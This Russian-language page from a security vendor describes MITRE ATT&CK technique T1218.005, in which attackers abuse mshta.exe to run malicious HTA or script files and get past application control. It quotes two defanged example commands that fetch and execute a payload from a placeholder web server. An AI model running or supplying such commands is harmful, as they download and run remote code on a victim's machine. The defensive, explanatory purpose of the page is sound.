Примеры обнаружения с помощью продуктов "Кода Безопасности":
Техники: T1218 , T1218.001 , T1218.002 , T1218.003 , T1218.004 , T1218.005 , T1218.007 , T1218.008 , T1218.009 , T1218.010 , T1218.011 , T1218.012 , T1218.013 , T1218.014 , T1218.015
Злоумышленники могут использовать mshta.exe для прокси-исполнения вредоносных файлов .hta и Javascript или VBScript через доверенную утилиту Windows.Существует несколько примеров использования mshta.exe различными типами угроз при первоначальной компрометации и для выполнения кода (Цитата: Cylance Dust Storm) (Цитата: Red Canary HTA Abuse Part Deux) (Цитата: FireEye Attacks Leveraging HTA) (Цитата: Airbus Security Kovter Analysis) (Цитата: FireEye FIN7 April 2017)
Mshta.exe - это утилита, выполняющая файлы Microsoft HTML Applications (HTA). (Цитата: Wikipedia HTML Application) HTA - это автономные приложения, которые выполняются с использованием тех же моделей и технологий, что и Internet Explorer, но вне браузера.(Цитата: MSDN HTML Applications)
Файлы могут быть выполнены mshta.exe с помощью встроенного скрипта: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct")"))
Они также могут выполняться непосредственно с URL-адресов: mshta http[:]//webserver/payload[.]hta
Mshta.exe может использоваться для обхода решений по контролю приложений, которые не учитывают его потенциальное применение. Поскольку mshta.exe выполняется вне контекста безопасности Internet Explorer, он также обходит настройки безопасности браузера.(Цитата: LOLBAS Mshta)
https://attack.mitre.org/techniques/T1218/005
Визуализация смежных техник для T1218.005
| № | Техника |
|---|
